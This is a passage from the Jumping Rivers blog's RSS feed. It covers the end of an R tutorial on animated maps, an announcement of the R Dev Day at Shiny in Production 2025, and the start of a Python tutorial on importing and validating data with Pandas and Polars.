&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Year: {closest_state}&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Life Expectancy&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_void&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_viridis_b&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;inside&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position.inside &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.23&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.23&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.border &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;animation &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;transition_states&lt;/span&gt;(states &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;animate&lt;/span&gt;(animation,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; renderer &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gifski_renderer&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;img/map2.gif&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/animated-map/img/map2.gif" class="image-center" style="width: 450px;" alt = "Final animation with all countries."/&gt;
&lt;p&gt;So that is our final animated map, of course we could add more styling
or complexity - maybe in a future blog. If you want to learn more about
working the topic, check out our &lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet" rel="external"&gt;Spatial Data Analysis with R
course&lt;/a&gt;
or another Jumping Rivers blog, &lt;a href="https://www.jumpingrivers.com/blog/2021-thinking-about-maps-and-ice-cream/" rel="external"&gt;&lt;em&gt;Thinking About Maps and Ice
Cream&lt;/em&gt;&lt;/a&gt;
by Nicola Rennie.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/animated-map/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: R Dev Day</title><link>https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/</link><pubDate>Thu, 24 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Do you use R? Would you like to play a part in sustaining it? Find out about the R Dev Day that is returning as a satellite event to &lt;a href="https://shiny-in-production.jumpingrivers.com" rel="external"&gt;Shiny in Production 2025&lt;/a&gt;. This post will answer questions you may have, such as: &amp;ldquo;Do I need to be an R guru to participate?&amp;rdquo;, &amp;ldquo;What will I be expected to do?&amp;rdquo;, and &amp;ldquo;Is there a cost to attend?&amp;rdquo;. Hopefully by the end, you&amp;rsquo;ll be motivated to sign up!&lt;/p&gt;
&lt;h2 id="what-is-an-r-dev-day"&gt;What is an R Dev Day?&lt;/h2&gt;
&lt;p&gt;An R Dev Day is a hands-on collaborative event, where people work in small groups on contributions to base R or to infrastructure that supports such contributions from the community.&lt;/p&gt;
&lt;h2 id="what-do-you-mean-by-base-r"&gt;What do you mean by &lt;em&gt;base R&lt;/em&gt;?&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;Base R&lt;/em&gt; is the colloquial term for everything that comes in the source distribution of R. From a user&amp;rsquo;s point of view, the main components are the &lt;a href="https://cran.r-project.org/manuals.html" rel="external"&gt;R manuals&lt;/a&gt; and 14 packages, including &lt;strong&gt;base&lt;/strong&gt;, &lt;strong&gt;datasets&lt;/strong&gt;, &lt;strong&gt;graphics&lt;/strong&gt;, and &lt;strong&gt;stats&lt;/strong&gt;. This codebase is maintained by the &lt;a href="https://www.r-project.org/contributors.html" rel="external"&gt;R Core Team&lt;/a&gt; with contributions from the wider community.&lt;/p&gt;
&lt;h2 id="what-do-you-mean-by-infrastructure"&gt;What do you mean by &lt;em&gt;infrastructure&lt;/em&gt;?&lt;/h2&gt;
&lt;p&gt;In this context, we&amp;rsquo;re using &lt;em&gt;infrastructure&lt;/em&gt; to refer to any documentation or tooling that facilitates or encourages contribution. Some examples are the &lt;a href="https://contributor.r-project.org/rdevguide/" rel="external"&gt;R Development Guide&lt;/a&gt; Quarto book, the &lt;a href="https://github.com/r-devel/r-dev-env" rel="external"&gt;R Dev Container&lt;/a&gt; containerised development environment, and the &lt;a href="https://contributor.r-project.org/translations-dashboard/" rel="external"&gt;Translations Dashboard&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="do-i-need-to-be-an-r-guru-to-participate"&gt;Do I need to be an R guru to participate?&lt;/h2&gt;
&lt;p&gt;Come as you are! We aim to prepare a range of tasks suitable for people with different skills, so you can find something that matches your knowledge and experience. When you register, you can select the areas that you&amp;rsquo;re interested in contributing to and let us know if you have particular skills to offer.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t forget, you&amp;rsquo;ll be working in a small group, so you can benefit from each other&amp;rsquo;s expertise, and there will be experienced developers on hand to help out!&lt;/p&gt;
&lt;h2 id="what-will-i-be-expected-to-do"&gt;What will I be expected to do?&lt;/h2&gt;
&lt;p&gt;Tasks will be prepared in advance on the r-dev-day GitHub repo. You can check out some of the &lt;a href="https://github.com/r-devel/r-dev-day/issues?q=is%3Aissue%20state%3Aclosed" rel="external"&gt;closed issues&lt;/a&gt; from past R Dev Days. Typical tasks include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Contributing to fixing bugs in base R
&lt;ul&gt;
&lt;li&gt;Creating a reproducible example (&lt;em&gt;reprex&lt;/em&gt;), e.g., &lt;a href="https://github.com/r-devel/r-dev-day/issues/75" rel="external"&gt;Bug 17148: rasterImage shows incorrect image orientation&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Debugging an issue to find the root cause, e.g., &lt;a href="https://github.com/r-devel/bug-bbq/issues/1" rel="external"&gt;Bug 17616 - Anomaly with contrast functions&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Proposing a patch to fix an issue, e.g., &lt;a href="https://github.com/r-devel/r-dev-day/issues/77" rel="external"&gt;making a minor change that has already been suggested&lt;/a&gt;, &lt;a href="https://github.com/r-devel/r-dev-day/issues/32" rel="external"&gt;making larger changes to an R function after some analysis&lt;/a&gt;, or &lt;a href="https://github.com/r-devel/r-dev-day/issues/12" rel="external"&gt;updating the C code underlying an R function to fix a bug&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Adding a new section in the R Dev Guide, e.g., &lt;a href="https://github.com/r-devel/r-dev-day/issues/57" rel="external"&gt;Document how to make a feature request&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Translating messages, errors and warnings via the &lt;a href="https://translate.rx.studio/projects/r-project/" rel="external"&gt;Weblate&lt;/a&gt; online interface.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We aim to prepare tasks where you can make good progress and report back at the end of the event. If you can continue to contribute on an ad-hoc basis after the event, e.g., responding to a review of your contribution or taking on a new task, that is very much appreciated, but we understand if you can&amp;rsquo;t.&lt;/p&gt;
&lt;h2 id="when-and-where-is-the-r-dev-day"&gt;When and where is the R Dev Day?&lt;/h2&gt;
&lt;p&gt;R Dev Day @ SIP 2025 will take place on the Tuesday afternoon and Wednesday morning, before the Shiny in Production 2025 tutorials. It will be in the same building as the main conference.&lt;/p&gt;
&lt;h2 id="is-there-a-cost-to-attend"&gt;Is there a cost to attend?&lt;/h2&gt;
&lt;p&gt;No! The event is free to attend and open to people who are not attending Shiny in Production 2025. However, R Dev Day @ SIP 2025 participants receive 20% off
Shiny in Production 2025 registration and early bird registration for the conference is open till Saturday 9 August, so we encourage you to register for both events while there is space left!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://pretix.eu/r-contributors/r-dev-day-sip-2025/" rel="external"&gt;Register for R Dev Day @ SIP 2025&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip-2025-r-dev-day/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Importing Data with Python</title><link>https://www.jumpingrivers.com/blog/python-data-import/</link><pubDate>Thu, 17 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-data-import/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-data-import/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-data-import/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;!---
Russ is planning a series of blog posts that relate to the key parts of the data science workflow
(as outlined in R4DS by Hadley) but using Python tools.
&amp;#10;This posts relates to data import (and validation).
- pandas and polars - similarities
- using arrow in Python (alternative solutions for bigger-than-memory: dask, databases)
-
&amp;#10;Subsequent posts will talk about tidying, transforming, visualisation, modelling and communication
using Python.
&amp;#10;Having worked on the blog post, it took a long time just to import data into Polars and Pandas in a
sensible way, so the emphasis of the post has changed. I just want to show how to import data,
mention lazy-Polars, explain how to validate data-types/values for imported data, and show how to
do at-import conversion of data for both Polars and Pandas.
--&gt;
&lt;p&gt;Importing data is a key step in the data science workflow. It also has a
huge responsibility. How you import (or connect to) a dataset has
consequences for how you work with that data throughout a project,
because a Pandas DataFrame (say) requires Pandas-specific code.
Similarly, your data constrains your code - if it can fit in memory on a
single computer, the constraints are different than if your data is so
large that its storage must be distributed. Data-import is a key place
where a data-project can go wrong. If you import a dataset without
validating that it contains sensible values, a nasty surprise may await
you….&lt;/p&gt;
&lt;p&gt;Python has wonderful libraries for data manipulation and analysis. You
can readily work with data sources of a variety of types. For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;that are too big to hold in memory;&lt;/li&gt;
&lt;li&gt;that are distributed across a network;&lt;/li&gt;
&lt;li&gt;that update rapidly;&lt;/li&gt;
&lt;li&gt;or that don’t easily conform to a tabular, relational form.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Python data stack is sufficiently mature that there are multiple
libraries for all of these settings. There are some moves to introduce a
&lt;a href="https://data-apis.org/blog/dataframe_standard_rfc/" rel="external"&gt;standardised syntax&lt;/a&gt; for some
data-frame functionality across libraries. At Jumping Rivers, we have a
number of
&lt;a href="https://www.jumpingrivers.com/training/all-courses/?languages=Python" rel="external"&gt;Python training courses&lt;/a&gt;,
and teach how to use Pandas, PySpark, Numpy and how to work with
databases via SQL from Python.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-python-data-import"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="importing-into-memory"&gt;Importing into memory&lt;/h2&gt;
&lt;!--- In-memory: pandas vs polars --&gt;
&lt;p&gt;Firstly we will compare two in-memory data-frame packages:
&lt;a href="https://pandas.pydata.org/" rel="external"&gt;Pandas&lt;/a&gt; and &lt;a href="https://pola.rs/" rel="external"&gt;Polars&lt;/a&gt;. We
will work in a virtual environment (so that the packages installed are
handled independently of the system-wide Python; see our Barbie-themed
&lt;a href="https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/" rel="external"&gt;blog post&lt;/a&gt;
on virtual environments).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [Linux terminal commands]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create &amp;amp; activate a new virtual environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install pandas and polars into the environment&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install pandas polars
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will generate a simple dataset to import with the two packages.
&lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt; download numbers for a specific Python package
can be obtained using the
&lt;a href="https://pypi.org/project/pypistats/" rel="external"&gt;&lt;code&gt;pypistats&lt;/code&gt;&lt;/a&gt; package. After
installing it, we will pull out the number of downloads for the package
&lt;a href="https://docs.pytest.org/en/stable/" rel="external"&gt;&lt;code&gt;pytest&lt;/code&gt;&lt;/a&gt; - see our recent
&lt;a href="https://www.jumpingrivers.com/blog/?search=pytest" rel="external"&gt;blog posts&lt;/a&gt; for an
introduction to this testing library.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [Linux terminal commands]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install pypistats&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install pypistats
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Obtain download-statistics for `pytest` in tab-separated format&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pypistats python_minor -f tsv pytest &amp;gt; data/pytest-downloads.tsv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The structure of that file is straight-forward. It records both the
number, and the percentage, of &lt;code&gt;pytest&lt;/code&gt; downloads across each minor
version of Python (“3.8”, “3.9” and so on) for the last 180 days (a
default time-span).&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# [Linux terminal commands]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;head data/pytest-downloads.tsv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## &amp;quot;category&amp;quot; &amp;quot;percent&amp;quot; &amp;quot;downloads&amp;quot;
## &amp;quot;3.11&amp;quot; &amp;quot;23.40%&amp;quot; 282,343,944
## &amp;quot;3.9&amp;quot; &amp;quot;18.78%&amp;quot; 226,548,604
## &amp;quot;3.10&amp;quot; &amp;quot;18.74%&amp;quot; 226,155,405
## &amp;quot;3.12&amp;quot; &amp;quot;15.48%&amp;quot; 186,819,921
## &amp;quot;null&amp;quot; &amp;quot;8.41%&amp;quot; 101,489,156
## &amp;quot;3.8&amp;quot; &amp;quot;6.13%&amp;quot; 73,965,471
## &amp;quot;3.13&amp;quot; &amp;quot;4.91%&amp;quot; 59,253,846
## &amp;quot;3.7&amp;quot; &amp;quot;3.36%&amp;quot; 40,551,618
## &amp;quot;3.6&amp;quot; &amp;quot;0.54%&amp;quot; 6,546,017
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it should be trivial to import it into Python using either Pandas or
Polars.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;data/pytest-downloads.tsv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;], sep&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category percent downloads
## 0 3.11 23.40% 282,343,944
## 1 3.9 18.78% 226,548,604
## 2 3.10 18.74% 226,155,405
## 3 3.12 15.48% 186,819,921
## 4 NaN 8.41% 101,489,156
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;polars&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pl&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(files[&lt;span style="color:#a5d6ff"&gt;&amp;#34;pytest_data&amp;#34;&lt;/span&gt;], separator&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;\t&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;downloads_pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;head()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## shape: (5, 3)
## ┌──────────┬─────────┬─────────────┐
## │ category ┆ percent ┆ downloads │
## │ --- ┆ --- ┆ --- │
## │ str ┆ str ┆ str │
## ╞══════════╪═════════╪═════════════╡
## │ 3.11 ┆ 23.40% ┆ 282,343,944 │
## │ 3.9 ┆ 18.78% ┆ 226,548,604 │
## │ 3.10 ┆ 18.74% ┆ 226,155,405 │
## │ 3.12 ┆ 15.48% ┆ 186,819,921 │
## │ null ┆ 8.41% ┆ 101,489,156 │
## └──────────┴─────────┴─────────────┘
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can see that Pytest was downloaded ~ 280 million times on Python
3.11, and this accounted for about 23% of downloads.&lt;/p&gt;
&lt;p&gt;The syntax for importing the dataset using the two libraries is almost
identical. The only difference for the &lt;code&gt;read_csv()&lt;/code&gt; function is that you
use &lt;code&gt;sep=...&lt;/code&gt; in Pandas and &lt;code&gt;separator=...&lt;/code&gt; in Polars.&lt;/p&gt;
&lt;p&gt;Polars is
&lt;a href="https://pythonspeed.com/articles/polars-memory-pandas/" rel="external"&gt;more memory efficient&lt;/a&gt;
than Pandas in a lot of settings. One of the memory-efficiencies that Polars
allows, is filtering by rows and columns during import. To take
advantage of this, you can use the &lt;code&gt;scan_csv()&lt;/code&gt; function in Polars. This
creates a lazy data-frame that can be directly manipulated by Polars
DataFrame methods. These method calls are applied at the point when the
data is loaded, rather than on an in-memory data-frame. The Polars
website has
&lt;a href="https://docs.pola.rs/user-guide/concepts/lazy-api/" rel="external"&gt;far more details&lt;/a&gt; about the
lazy API, and the benefits it can bring to your work.&lt;/p&gt;
&lt;p&gt;Here, we will be working with eagerly-loaded, in-memory, data-frames - a
good choice during exploratory work.&lt;/p&gt;
&lt;!---
What would I miss from R? Are they available in standard libraries
- importing columns as a specified data-type
- data-manipulation syntax
- working with DB using DF code
--&gt;
&lt;h2 id="validating-a-dataset"&gt;Validating a dataset&lt;/h2&gt;
&lt;p&gt;Have we loaded what we wanted?&lt;/p&gt;
&lt;p&gt;The Pandas/Polars &lt;code&gt;.dtypes&lt;/code&gt; attribute gives you information about the
data-types in each column of a data-frame:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(downloads_pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dtypes)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## category object
## percent object
## downloads object
## dtype: object
&lt;/code&gt;&lt;/pre&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(downloads_pl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;dtypes)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## [String, String, String]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Again, the formatting of the output looks a little different between the
two packages, but the results are broadly similar: all of our data—the
version-strings in ‘category’, the percentage values and download
counts—have been read as character strings. Pandas tell us they are
’object’s, but we know what that typically means they are strings:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;type(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; downloads_pd[&lt;span style="color:#a5d6ff"&gt;&amp;#34;category&amp;#34;&lt;/span&gt;][&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre&gt;&lt;code&gt;## &amp;lt;class 'str'&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So Python has imported our data incorrectly. In a real project we would
want to know about this, so we might validate the data in our datasets.
We would also want to prevent data-import mistakes as far as possible
(see later) by being more explicit about how each column is imported and
converted.&lt;/p&gt;
&lt;p&gt;Python has a range of packages for validating both the schema for, and
the values in, a dataset.&lt;/p&gt;
&lt;p&gt;For a general class, if you want to check the data-types that are stored
in the fields, you could use
&lt;a href="https://docs.pydantic.dev/latest/" rel="external"&gt;Pydantic&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# [Terminal]
pip install pydantic
&lt;/code&gt;&lt;/pre&gt;
